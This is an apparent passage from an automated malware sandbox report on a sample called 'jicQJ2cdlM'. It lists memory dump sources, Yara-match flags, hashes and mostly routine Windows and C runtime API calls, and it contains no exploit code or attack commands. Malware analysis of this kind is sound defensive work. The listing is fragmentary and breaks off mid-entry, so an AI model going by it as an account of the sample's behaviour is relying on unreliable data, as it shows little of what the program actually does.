• _free.LIBCMT ref: 00A120E8
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: __cftoe
• String ID: f(@$f(@
• API String ID: 4189289331-2391611762
APIs
• _ValidateLocalCookies.LIBCMT ref: 0042871B
• ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
• _ValidateLocalCookies.LIBCMT ref: 004287B1
• __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
• _ValidateLocalCookies.LIBCMT ref: 00428831
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: 11@$@fB$csm
• API String ID: 1170836740-1464837749
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A04AED
  • Part of subcall function 00A04DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00A04820), ref: 00A04DCC
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00A04B02
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A04B11
• __CxxThrowException@8.LIBVCRUNTIME ref: 00A04B1F
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00A04B95
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A04BD5
• __CxxThrowException@8.LIBVCRUNTIME ref: 00A04BE3
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID: 11@
• API String ID: 3151764488-1785270423
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                                                    • _free.LIBCMT ref: 004311FD
                                                                                    • _free.LIBCMT ref: 00431216
                                                                                    • _free.LIBCMT ref: 00431248
                                                                                    • _free.LIBCMT ref: 00431251
                                                                                    • _free.LIBCMT ref: 0043125D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4275183328-1785270423
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • _free.LIBCMT ref: 00A11464
                                                                                    • _free.LIBCMT ref: 00A1147D
                                                                                    • _free.LIBCMT ref: 00A114AF
                                                                                    • _free.LIBCMT ref: 00A114B8
                                                                                    • _free.LIBCMT ref: 00A114C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast
                                                                                    • String ID: 11@$C
                                                                                    • API String ID: 3291180501-2085848483
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A03071
                                                                                      • Part of subcall function 009F8AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 009F8ADD
                                                                                    • SafeSQueue.LIBCONCRT ref: 00A0308A
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A0314A
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A0316B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03179
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3496964030-1785270423
                                                                                    APIs
                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 009FC6FC
                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 009FC720
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC731
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC73F
                                                                                      • Part of subcall function 009E1370: __Mtx_unlock.LIBCPMT ref: 009E1377
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009FC74F
                                                                                      • Part of subcall function 009FC40F: __Cnd_broadcast.LIBCPMT ref: 009FC416
                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 009FC75D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4258476935-1785270423
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                    • API String ID: 2005118841-316725708
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                                                    • __alloca_probe_16.LIBCMT ref: 004321E6
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                                                    • __alloca_probe_16.LIBCMT ref: 004322CB
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                                                    • __freea.LIBCMT ref: 0043233B
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    • __freea.LIBCMT ref: 00432344
                                                                                    • __freea.LIBCMT ref: 00432369
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3864826663-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                                                    • __fassign.LIBCMT ref: 00433960
                                                                                    • __fassign.LIBCMT ref: 0043397B
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                                                    • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                                                    • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,00A0C4C4,E0830C40,?,?,?,?,?,?,00A1427F,009EE061,00A0C4C4,?,00A0C4C4,00A0C4C4,009EE061), ref: 00A13B4C
                                                                                    • __fassign.LIBCMT ref: 00A13BC7
                                                                                    • __fassign.LIBCMT ref: 00A13BE2
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00A0C4C4,00000001,?,00000005,00000000,00000000), ref: 00A13C08
                                                                                    • WriteFile.KERNEL32(?,?,00000000,00A1427F,00000000,?,?,?,?,?,?,?,?,?,00A1427F,009EE061), ref: 00A13C27
                                                                                    • WriteFile.KERNEL32(?,009EE061,00000001,00A1427F,00000000,?,?,?,?,?,?,?,?,?,00A1427F,009EE061), ref: 00A13C60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    APIs
                                                                                    • _SpinWait.LIBCONCRT ref: 009FB172
                                                                                      • Part of subcall function 009F11A8: _SpinWait.LIBCONCRT ref: 009F11C0
                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 009FB186
                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 009FB1B8
                                                                                    • List.LIBCMT ref: 009FB23B
                                                                                    • List.LIBCMT ref: 009FB24A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                    • String ID: 6+A
                                                                                    • API String ID: 3281396844-2819411039
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
• _free.LIBCMT ref: 0043A3F1
  • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
  • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
• _free.LIBCMT ref: 0043A3FC
• _free.LIBCMT ref: 0043A407
• _free.LIBCMT ref: 0043A45B
• _free.LIBCMT ref: 0043A466
• _free.LIBCMT ref: 0043A471
• _free.LIBCMT ref: 0043A47C
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
  • Part of subcall function 00A1A351: _free.LIBCMT ref: 00A1A37A
• _free.LIBCMT ref: 00A1A658
  • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
  • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
• _free.LIBCMT ref: 00A1A663
• _free.LIBCMT ref: 00A1A66E
• _free.LIBCMT ref: 00A1A6C2
• _free.LIBCMT ref: 00A1A6CD
• _free.LIBCMT ref: 00A1A6D8
• _free.LIBCMT ref: 00A1A6E3
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
• GetLastError.KERNEL32 ref: 00412426
• GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
• GetLastError.KERNEL32 ref: 0041245D
• GetLastError.KERNEL32 ref: 0041246F
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 009F2687
• GetLastError.KERNEL32 ref: 009F268D
• GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 009F26BA
• GetLastError.KERNEL32 ref: 009F26C4
• GetLastError.KERNEL32 ref: 009F26D6
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F26EC
• __CxxThrowException@8.LIBVCRUNTIME ref: 009F26FA
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,009F672B), ref: 009F24D6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009F24E4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009F24F2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,009F672B), ref: 009F2520
• GetProcAddress.KERNEL32(00000000), ref: 009F2527
• GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F2542
• GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F254E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2564
• __CxxThrowException@8.LIBVCRUNTIME ref: 009F2572
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: 11@$CorExitProcess$mscoree.dll
• API String ID: 4061214504-3445089953
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00A1260C,00000001,00000001,?), ref: 00A12415
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A1260C,00000001,00000001,?,?,?,?), ref: 00A1249B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A12595
• __freea.LIBCMT ref: 00A125A2
  • Part of subcall function 00A1392E: RtlAllocateHeap.NTDLL(00000000,009EDAFC,00000000), ref: 00A13960
• __freea.LIBCMT ref: 00A125AB
• __freea.LIBCMT ref: 00A125D0
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
APIs
• GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B077ECD6), ref: 00428E08
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
• SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B077ECD6), ref: 00428E81
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,00A09058,00A069E9,00A20927,00000008,00A20C8C,?,?,?,?,00A03CD2,?,?,0045A064), ref: 00A0906F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A0907D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A09096
• SetLastError.KERNEL32(00000000,?,00A09058,00A069E9,00A20927,00000008,00A20C8C,?,?,?,?,00A03CD2,?,?,0045A064), ref: 00A090E8
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
                                                                                    • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction ID: 48cb3876de59ecb804c40884b400aeb9d064766ef6c60ee0483321d67b823370
                                                                                    • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction Fuzzy Hash: 1C01263221AB1E6EE7342FB47C899AB2754EB19776B300339F124411F3EF138C106999
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                                                    • int.LIBCPMT ref: 00404D9F
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                                                    • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009E4FEF
                                                                                    • int.LIBCPMT ref: 009E5006
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009E500F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009E5040
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009E5056
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009E5074
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction ID: 22ad41a6793f818ad5ce0359ccde2018b622f781a88102d63341ad8e5c8aac6d
                                                                                    • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction Fuzzy Hash: 9B11EC718006689BCB23EBA1C802BED7364AF80315F294418F515672D2DB749E05CBD0
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                                                    • int.LIBCPMT ref: 0040C1D6
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                                                    • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                                                    • int.LIBCPMT ref: 0040551F
